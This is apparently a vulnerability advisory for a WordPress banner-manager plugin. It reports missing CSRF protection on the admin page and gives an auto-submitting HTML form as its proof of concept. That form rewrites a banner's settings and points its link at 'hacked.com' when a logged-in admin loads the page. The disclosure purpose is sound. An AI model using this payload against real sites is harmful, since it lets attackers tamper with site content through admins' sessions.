The plugin does not perform CSRF checks on POST requests to its admin page, allowing an attacker to trick a logged in admin to add, modify or delete banners from the plugin by submitting a form.
<form id="test" action="https://example.com/wp-admin/admin.php?page=useful-banner-manager%2Fbanners.php&ubm_banner_id=1" method="POST" enctype="multipart/form-data"> <input type="text" name="ubm_banner_name" value="giphy"> <input type="text" name="ubm_banner_type" value="gif"> <input type="file" name="ubm_banner_file" value=""> <input type="text" name="ubm_banner_title" value="test"> <input type="text" name="ubm_banner_alt" value="test"> <input type="text" name="ubm_banner_link" value="https://hacked.com"> <input type="text" name="ubm_link_target" value="_self"> <input type="text" name="ubm_link_rel" value="dofollow"> <input type="text" name="ubm_banner_width" value=""> <input type="text" name="ubm_banner_height" value=""> <input type="text" name="ubm_active_until" value=""> <input type="text" name="ubm_banner_order" value="0"> <input type="text" name="ubm_wrapper_id" value=""> <input type="text" name="ubm_wrapper_class" value=""> <input type="text" name="ubm_is_visible" value="yes"> <input type="text" name="ubm_save_banner" value="Save"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-05-17 (about 3 months ago)
2022-05-17 (about 3 months ago)
2022-05-18 (about 3 months ago)